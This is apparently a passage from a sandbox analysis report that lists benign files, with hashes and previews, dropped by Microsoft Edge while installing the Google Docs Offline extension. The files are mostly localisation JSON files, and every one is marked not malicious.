SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.751992630887702
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
MD5:	250C48F4915DD4C0DFA7E7E021A4F066
SHA1:	092A98BF40D8C18280393BF3811A7DFA9A9FD326
SHA-256:	26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
SHA-512:	8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417833205646285
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
MD5:	236D2DD305D64C2B6ABD232ED53270DF
SHA1:	9F6885E95FBC4213631F0B0EA49C803D07D34136
